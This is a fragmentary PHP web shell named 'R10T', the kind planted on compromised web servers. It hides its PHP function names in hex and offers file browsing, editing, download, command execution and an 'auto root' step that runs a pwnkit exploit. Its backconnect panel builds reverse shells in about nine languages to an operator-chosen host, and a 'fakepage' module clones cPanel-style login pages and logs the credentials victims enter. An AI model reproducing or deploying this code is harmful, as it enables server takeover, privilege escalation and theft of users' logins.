R10T [ <?= $_SERVER['SERVER

0 '676c6f62', # gl ob => 1 '69735f646972', # is_d ir => 2 '69735f66696c65', # is_ file => 3 '69735f7772697461626c65', # is_wr iteable => 4 '69735f7265616461626c65', # is_re adble => 5 '66696c657065726d73', # fileper ms => 6 '66696c65', # f ile => 7 '7068705f756e616d65', # php_unam e => 8 '6765745f63757272656e745f75736572', # getc urrentuser => 9 '68746d6c7370656369616c6368617273', # html special => 10 '66696c655f6765745f636f6e74656e7473', # fil e_get_contents => 11 '6d6b646972', # mk dir => 12 '746f756368', # to uch => 13 '6368646972', # ch dir => 14 '72656e616d65', # ren ame => 15 '65786563', # exe c => 16 '7061737374687275', # pas sthru => 17 '73797374656d', # syst em => 18 '7368656c6c5f65786563', # sh ell_exec => 19 '706f70656e', # p open => 20 '70636c6f7365', # pcl ose => 21 '73747265616d5f6765745f636f6e74656e7473', # stre amgetcontents => 22 '70726f635f6f70656e', # p roc_open => 23 '756e6c696e6b', # un link => 24 '726d646972', # rmd ir => 25 '666f70656e', # fop en => 26 '66636c6f7365', # fcl ose => 27 '66696c655f7075745f636f6e74656e7473', # file_put_c ontents => 28 '6d6f76655f75706c6f616465645f66696c65', # move_up loaded_file => 29 '63686d6f64', # ch mod => 30 '7379735f6765745f74656d705f646972', # temp _dir => 31 ]; $hitung_array = count($Array); for ($i = 0; $i < $hitung_array; $i++) { $fungsi[] = unx($Array[$i]); } if (isset($_GET['d'])) { $cdir = unx($_GET['d']); $fungsi[14]($cdir); } else { $cdir = $fungsi[0](); } function download($file) { if (file_exists($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename=' . basename($file)); header('Content-Transfer-Encoding: binary'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); ob_clean(); flush(); readfile($file); exit; } } if ($_GET['don'] == true) { $FilesDon = download(unx($_GET['don'])); } ?> R10T [ <?= $_SERVER['SERVER_NAME']; ?> ]

$val) { if ($val == '' && $id == 0) { echo ' / '; continue; } if ($val == '') continue; echo '' . $val . ' / ' . ''; } echo "[ HOME SHELL ] "; ?>

Name	Size	Permission	Action
">	[ DIR ]	'; } elseif (!$fungsi[5]($fungsi[0]() . '/' . $_D)) { echo ''; } echo perms($fungsi[0]() . '/' . $_D); ?>
		'; } elseif (!is_readable($fungsi[0]() . '/' . $_F)) { echo ''; } echo perms($fungsi[0]() . '/' . $_F); ?>

Code Editor :

TERMINAL

TERMINAL

AUTO ROOT

<?php if ($fungsi[3]('.mad-root') && $fungsi[3]('pwnkit')) {
                                                    $response = $fungsi[11]('.mad-root');
                                                    $r_text = explode(" ", $response);
                                                    if ($r_text[0] == "uid=0(root)") {
                                                        if (isset($_POST['submit-root'])) {
                                                            echo cmd('./pwnkit "' . $_POST['root-terminal'] . '  2>&1"');
                                                        }
                                                    } else {
                                                        echo "This Device Is Not Vulnerable\n";
                                                        echo cmd('lsb_release -a') . "\n";
                                                        echo "Kernel Version : " . suggest_exploit() . "\n";
                                                    }
                                                } else {
                                                    $fungsi[24]('.mad-root');
                                                } ?>

&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\''); } else if ($_POST['R10T-bc'] == "python") { echo cmd('python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("' . $HostServer . '",' . $PortServer . '));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\''); } else if ($_POST['R10T-bc'] == "ruby") { echo cmd('ruby -rsocket -e\'f=TCPSocket.open("' . $HostServer . '",' . $PortServer . ').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)\''); } else if ($_POST['R10T-bc'] == "bash") { echo cmd('bash -i >& /dev/tcp/' . $HostServer . '/' . $PortServer . ' 0>&1'); } else if ($_POST['R10T-bc'] == "php") { echo cmd('php -r \'$sock=fsockopen("' . $HostServer . '",' . $PortServer . ');exec("/bin/sh -i <&3 >&3 2>&3");\''); } else if ($_POST['R10T-bc'] == "nc") { echo cmd('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ' . $HostServer . ' ' . $PortServer . ' >/tmp/f'); } else if ($_POST['R10T-bc'] == "sh") { echo cmd('sh -i >& /dev/tcp/' . $HostServer . '/' . $PortServer . ' 0>&1'); } else if ($_POST['R10T-bc'] == "xterm") { echo cmd('xterm -display ' . $HostServer . ':' . $PortServer); } else if ($_POST['R10T-bc'] == "golang") { echo cmd('echo \'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","' . $HostServer . ':' . $PortServer . '");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}\' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go'); } } if (isset($_POST['submit-fakepage'])) { $clone_page = $_POST['fakepage-clone']; $fake_root = $_POST['fakepage-root']; $logto = $_POST['fakepage-log']; $panel = $_POST['fakepage-clone']; $inject_to = $_POST['fakepage-iject']; $bind_on = $_POST['fakepage-bind']; $count = $_POST['fakepage-count']; if(!empty($clone_page) && !empty($fake_root) && !empty($logto) && !empty($inject_to) && !empty($bind_on) && $_POST['alfa3'] == '>>'){ echo __pre(); $target = $clone_page; $curl = new AlfaCURL(); $source_page = $curl->Send($target); if(!empty($source_page)){ $matched_form = ""; if($panel == "cpanel"){ if(preg_match('##', $source_page, $match)){ $matched_form = $match[0]; } }else{ if(preg_match('##', $source_page, $match)){ $matched_form = $match[0]; } } if(!empty($matched_form)){ $fake = ""; $pwd = str_replace($_SERVER["DOCUMENT_ROOT"], '', $fake_root); $uri = str_replace($_SERVER["DOCUMENT_ROOT"], '', $inject_to); if($panel == "cpanel"){ $port = "2083"; }else{ $target = str_replace(array("http://", "https://"), "", $target); $port = explode(":",$target); $port = $port[1]; } if(substr($uri, 0, 1) == "/"){ $uri = substr($uri, 1); } $uri = $_SERVER["HTTP_ORIGIN"] . '/' . str_replace("index.php", "", $uri) . '?:' . $port; $log_url = $_SERVER["HTTP_ORIGIN"] . $pwd . '/log.php'; if($panel == "cpanel"){ $form = '

'; }else{ $form = ''; } $fake = str_replace($matched_form, $form, $source_page); if(@!is_dir($fake_root)){ @mkdir($fake_root, 0777, true); } $cookie_name = "alfa_fakepage_counter" . rand(9999,99999); $post_user = 'user'; $post_pass = 'pass'; $resp_code = 'if(empty($user)){http_response_code(400);echo json_encode(array("message" => "no_username"));}else{http_response_code(401);}'; if($panel != "cpanel"){ $post_user = 'username'; $post_pass = 'password'; $resp_code = '@header("Location: ".$_SERVER[\'HTTP_REFERER\']);'; } $cpanel_log = ''.$count.'){@header("Location: /");exit;}@setcookie("'.$cookie_name.'", ((int)$_COOKIE["'.$cookie_name.'"] + 1), $cook_time, "/");$fp = @fopen("'.$logto.'", "a+");@fwrite($fp, $user . " : " . $pass . "\n");fclose($fp);sleep(3);'.$resp_code.'exit;}?>'; @file_put_contents($fake_root.'/log.php', $cpanel_log); if($panel == "cpanel"){ $fake = preg_replace(array('##', '#

#', '# #'), array('', '

', ''), $fake); } @file_put_contents($fake_root.'/index.php', $fake); $inject_code = ''; $bind_on_code = ''; @file_put_contents($inject_to, $inject_code . "\n" .@file_get_contents($inject_to)); @file_put_contents($bind_on, $bind_on_code . "\n" .@file_get_contents($bind_on)); echo "success...!"; }else{ echo "failed...!"; } }else{ echo("

Cannot open the target...!

${this.title}

:: Backconnect

:: fakepage

:: PHP Mailer

Code Editor :

Rename :

Change Permission :